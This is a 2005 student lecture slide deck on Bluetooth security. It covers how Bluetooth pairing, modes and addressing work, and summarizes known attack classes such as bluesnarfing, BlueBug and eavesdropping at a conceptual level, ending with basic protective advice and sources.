Bluetooth Vulnerabilities
ECE 478 Winter 05
Victor Yee

Topics
• What is Bluetooth? • Eavesdropping
• History • Impersonation
• SIG
• Cipher Vulnerabilities
• Modes
• Address
• Bluejacking
• Pairing • Bluesnarfing
• Bluetooone
• Bluesniper

What is Bluetooth?
• Wirelessly connect to
– Wireless headsets
– Handhelds
– Personal computers
– Printers
– Mobile phones
– Digital cameras
– GPS receivers
– Digital pens
– Automobiles

What is Bluetooth?
• Short-range (10m-100m) wireless specification
• Operating at 2.4GHz radio spectrum
• Allows up to 7 simultaneous connections
maintained by a signal radio.
• Data transfers at least 2Mb/s

History
• Named from Danish King Harold Bluetooth from
the 10th century
– instrumental in uniting warring factions that is now
Norway, Sweden, and Denmark
• The logo was designed by a Scandinavian firm
in which the runic character H & B were used

SIG
• Bluetooth Special Interest Group
– Privately held trade associations made up of leaders
• Telecom
• Computing
• Automotive
• Industrial automation
• Network industries.
– They are marketing and advancing the development
of the technology

Bluetooth Protocol Stack
• L2CAP - Logical Link Control and Adaptation
Protocol
• OBEX - Generalized Multi-Transport Object
Exchange Protocol
• RFCOMM - Serial Port Emulation
• SDP - Service Discovery Protocol
• TCS - Telephony Control protocol Specification

Modes
• Bluetooth devices can be in different modes
– Discoverable
• Device can be found by others searching in range
– Connectable
• Respond to messages from connected devices
– Non-Discoverable
– Non-Connectable

Address
• Bluetooth device address (MAC)
– Unique identifier for the device for all communication
– Device Access Code (DAC) is used to address the
device
– Channel Access Code (CAC) is used to identify the
channel
– DAC & CAC
• Determined by device address
• Not encrypted

Address
• Unique Address
– Track and monitor behavior of user
– Logs = Violation of privacy

Security Modes
• Mode 1
– No Security
• Mode 2
– Application/Service
based (L2CAP)
• Mode 3
– Link-Layer
• PIN Authentication
• Address Security
• encryption

Security Modes
• Difference between Mode 2 and Mode 3
– Bluetooth device initiates security procedures before
the channel is established during Mode 3

Security Modes
• Different security Modes for devices and
services
– Devices (2 Levels)
• Trusted Device – unrestricted access to all services
• Untrusted Device
– Services (3 Levels)
• Require authorization and authentication
• Require authentication only
• Open to all devices

How does Pairing Work?
• Two Bluetooth devices need to pair up before
data can be exchanged.
• PIN consisting of numeric digits from 0-9 is
established
• Device sends a random number to the other
device.
• Both devices compute the initiation key based
on a function of the shared PIN, Bluetooth
device address that received the random
number, and the random number.

PIN
• 0000 is default
– 50% of used PINs are 0000 (Laziness)
• 4 digits
– 10,000 Possibilities

Verification
• Other device responds the computed
computation back to the first device
• First device compares the received value to its
computed value if they are the same
• Then the roles switch

Eavesdropping
• Attacker is able to listen to messages or data
exchanged between devices.
– No application layer encryption
– Middle-person attack
• Voice data between phone and headset
• Obtain credit card information (Internet
purchases)
• Exhaustively guesses all PIN up to a certain
length

Impersonation
• If PIN is known, Attacker is able to impersonate
– Alter email responses (Internet Access)
– Data to be printed (Printer)

Cipher Vulnerabilities
• 128 bit key can be broken in 2^64
• Divide-and-conquer attacks are not
possible
– Need access to key stream over long periods
– Bluetooth has high resynchronization
frequencies

Bluejacking
• Sending anonymous messages to another
device without approval or authorization
• Example
– Tourists admirers Swedish handicrafts in a storefront
window, cell phone chirped with an anonymous note:
\"Try the blue sweaters. They keep you warm in the
winter.\"
Tourist is oblivious to who the sender is.

Bluesnarfing
• Snarf is network slang for unauthorized copy
• Theft of Data, Calendar Information, Phonebook
Contacts, Phone’s IMEI
– Stolen IMEI can be used for cloning a phone
• Attacker establishes connection without
confirmation
• Cell phones vulnerable to privacy invasion
• Devices can be purchased on the Internet
• Attackers exploit a flaw through OBEX Protocol
using a PUSH Channel attack

BlueBug
• Based on AT Commands
• Gives the attacker high levels of control to mobile
phones
– Phone calls
– Text Messages (SMS)
– Phonebook entries (Reading/Writing)
– Call Forwards
• Flaw on the RFCOMM channels
– Not announced over the Service Discovery Protocol (SDP)
– RFCOMM protocol provides emulation of serial ports over the
L2CAP protocol

Bluetooone
• Increasing the range
by attaching a
directional antenna
• Long Range attacks
• Not limited to 100
meters distance

Bluesniper
• Tested at 1.1 miles in
2004

Other Flaws
• Battery draining denial of service attack
– Occupies channel
– Drain battery from continuous scanning

Protection?
• Turn off Bluetooth when not in use
• Set to Non-Discoverable
• Choose Random PIN numbers (16 Octets)
• Confidential and Sensitive information should
not be transmitted

Sources
• Bluetooth.com
• Bluetooth.org
• Bluetooth Protocol Stack. thewirelessdirectory.com
• Ellie, Jelly (2004). Why ‘bluejacking’? Bluejackq.com
• Jakobsson, Markus. Security Weaknesses in Bluetooth. Lucent
Technologies.
• Laurie, Adam. (2003). Bluetooth Hacking – Full Disclosure.
trifinite.org.
• Laurie, Ben (2004). Bluetooth Security Briefs. thebunker.net
• Vainio, Juha (2000). Bluetooth Security. Helsinki Univ.
• Whitehouse, Ollie (2003). War Nibbling: Bluetooth Insecurity.
@stake Research Report.